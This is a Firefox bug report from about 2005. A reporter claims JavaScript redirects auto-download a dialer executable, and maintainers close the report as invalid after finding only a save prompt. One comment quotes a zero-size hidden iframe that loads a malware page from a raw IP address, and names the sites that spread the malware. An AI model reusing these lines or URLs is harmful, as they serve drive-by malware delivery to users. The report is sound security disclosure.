Closed
Bug 279499
Opened 20 years ago
Closed 20 years ago
auto download of malware, using javascripts contents and window.location
Categories
(Toolkit :: Downloads API, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: steveb, Assigned: bugs)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 There is a security problem with Javascript, which allows automatic downloads of content, such as spyware .EXE files. Using the following commands: <meta http-equiv="REFRESH" content="1;URL=http:// window.location="http:// and the window.setTimeout( functions I've upoaded an example here (text file, download with Save As) for someone to look at, which as you can see, downloads cmb_243461.exe automatically which is a dialer http://info.sanesecurity.com/dload.txt Reproducible: Always Steps to Reproduce: 1. Do a save as, on this link: http://info.sanesecurity.com/dload.txt 2. rename dload.txt to dload.html 3. Open dload.html with firefox and it's auto downloads malware :( Actual Results: it's auto downloads malware, an exe file... note it does not autorun, but will just sit there in your downloads folder, ready for you to click on it with explorer :( Expected Results: Ignored the download, or pop up a warning box
|
||
Comment 1•20 years ago
|
||
what do you mean with "automatic download" ? All I get is a file/save as dialog as expected (no security problem) ? (The file is also predownlaoded in the temp diurectory which is also noa security problem)
|
Reporter | |
Comment 2•20 years ago
|
||
(In reply to comment #1) > what do you mean with "automatic download" ? > > All I get is a file/save as dialog as expected (no security problem) ? > (The file is also predownlaoded in the temp diurectory which is also noa > security problem) I think the problem is when it's called from another script/iframe. This page here: httx://www.andr.net/sn/?l=n&pn=4 (AUTO DOWNLOADS BE CAREFUL) loads a script from here: httx://****-access.com/b/?id=st00071 (replace httx with http) Which then loads: <iframe width=0 height=0 src=http://217.73.66.1/dload.html?dload=243461> The dload.html is the same as dload.txt that you've aleady seen. You end up with cmb_243461.exe in your downloads directory, which is a dialer! Hope that helps (but be careful)
|
||
Comment 3•20 years ago
|
||
WFM. I'm willing to believe there's some way to get a profile into such a state that it will automatically download, maybe through an insecure extension or something, but for me with a fresh 1.0 or a fresh nightly profile, dload.txt/html just prompts to save, and andr.net does nothing at all.
|
|
Reporter | |
Comment 4•20 years ago
|
||
Hi, I did a complete uninstall of firefox, delete my profile, downloaded and installed a fresh v1.0. The site now asks if I want to download. Problem solved - must have been something in my profile. Thanks for looking at the problem so promptly. Firefox Team rocks! Steve
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Status: RESOLVED → UNCONFIRMED
Resolution: FIXED → ---
Version: unspecified → 1.0 Branch
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago → 20 years ago
Resolution: --- → INVALID
|
||
Comment 5•20 years ago
|
||
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b) Gecko/20050124 Firefox/1.0+ I think that I am seeing the same as everyone else: My Save File dialogue starts "You have chosen to open ... which is a: MS-DOS Executable". Of course, I haven't "chosen" to open it; and if there were a preference to disable downloads evinced by refresh onload handlers et cetera, I would use it.
|
||
Updated•16 years ago
|
Product: Firefox → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•